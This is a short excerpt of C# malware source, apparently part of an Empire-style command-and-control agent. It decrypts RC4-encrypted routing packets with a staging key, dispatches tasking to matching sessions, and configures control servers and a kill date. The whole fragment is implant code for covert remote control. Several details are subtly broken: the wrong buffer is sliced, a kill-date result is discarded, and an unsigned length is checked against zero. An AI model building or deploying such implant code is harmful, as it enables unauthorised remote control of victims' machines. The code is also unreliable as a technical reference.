//////////////////////////////////////////////////////////////////////////////// internal void decodeRoutingPacket(byte[] packetData, ref JobTracking jobTracking) { this.jobTracking = jobTracking; if (packetData.Length < 20) { return; } Int32 offset = 0; while (offset < packetData.Length) { byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray(); byte[] routingInitializationVector = routingPacket.Take(4).ToArray(); byte[] routingEncryptedData = packetData.Skip(4).Take(16).ToArray(); offset += 20; byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKeyBytes); byte[] routingData = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData); String packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray()); try { byte language = routingPacket[8]; byte metaData = routingPacket[9]; } catch (IndexOutOfRangeException error) { WriteOutputBad(error.ToString()); } byte[] extra = routingPacket.Skip(10).Take(2).ToArray(); UInt32 packetLength = BitConverter.ToUInt32(routingData, 12); if (packetLength < 0) { break; } if (sessionId == packetSessionId) { byte[] encryptedData = packetData.Skip(offset).Take(offset + (Int32)packetLength - 1).ToArray(); offset += (Int32)packetLength; try { processTaskingPackets(encryptedData); } catch (Exception error) { WriteOutputBad(error.ToString()); } } } }
//////////////////////////////////////////////////////////////////////////////// public Agent(String stagingKey, String sessionKey, String sessionId, String servers) { this.sessionId = sessionId; defaultResponse = ""; killDate = DateTime.Now; killDate.AddYears(1); controlServers = servers.Split(','); coms = new Coms(sessionId, stagingKey, sessionKey, controlServers); jobTracking = new JobTracking(); }